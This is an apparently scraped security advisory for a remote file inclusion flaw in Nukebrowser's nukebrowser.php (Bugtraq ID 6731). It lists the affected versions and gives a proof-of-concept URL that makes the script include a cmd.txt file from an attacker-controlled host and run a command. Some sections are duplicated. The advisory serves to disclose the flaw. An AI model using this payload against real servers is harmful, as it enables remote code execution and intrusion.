Nukebrowser Remote File Include Vulnerability
BID:6731
Info
Nukebrowser Remote File Include Vulnerability
| Bugtraq ID: | 6731 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 30 2003 12:00AM |
| Updated: | Jan 30 2003 12:00AM |
| Credit: | Discovery of this vulnerability credited to Havenard <[email protected]>. |
| Vulnerable: |
Nukebrowser Nukebrowser 2.41 Nukebrowser Nukebrowser 2.20 Nukebrowser Nukebrowser 2.11 Nukebrowser Nukebrowser 2.5 Nukebrowser Nukebrowser 2.3 Nukebrowser Nukebrowser 2.1 |
| Not Vulnerable: | |
Discussion
Nukebrowser Remote File Include Vulnerability
Nukebrowser is prone to an issue which may allow remote attackers to include files located on remote servers. This issue is present in the nukebrowser.php script file.
Under some circumstances, it is possible for remote attackers to influence the include path for 'cmd.txt' to point to an external file on a remote server by manipulating some URI parameters.
Nukebrowser is prone to an issue which may allow remote attackers to include files located on remote servers. This issue is present in the nukebrowser.php script file.
Under some circumstances, it is possible for remote attackers to influence the include path for 'cmd.txt' to point to an external file on a remote server by manipulating some URI parameters.
Exploit / POC
Nukebrowser Remote File Include Vulnerability
The following proof of concept was provided:
http://[victim]/nukebrowser.php?filnavn=http://www.site.com&filhead=http://[web hosting]/cmd.txt&cmd=id
The following proof of concept was provided:
http://[victim]/nukebrowser.php?filnavn=http://www.site.com&filhead=http://[web hosting]/cmd.txt&cmd=id
References
Nukebrowser Remote File Include Vulnerability
References:
References:
- Nukebrowser Path Disclosure Vulnerability ("Pirates of \(\\\)etWork"
)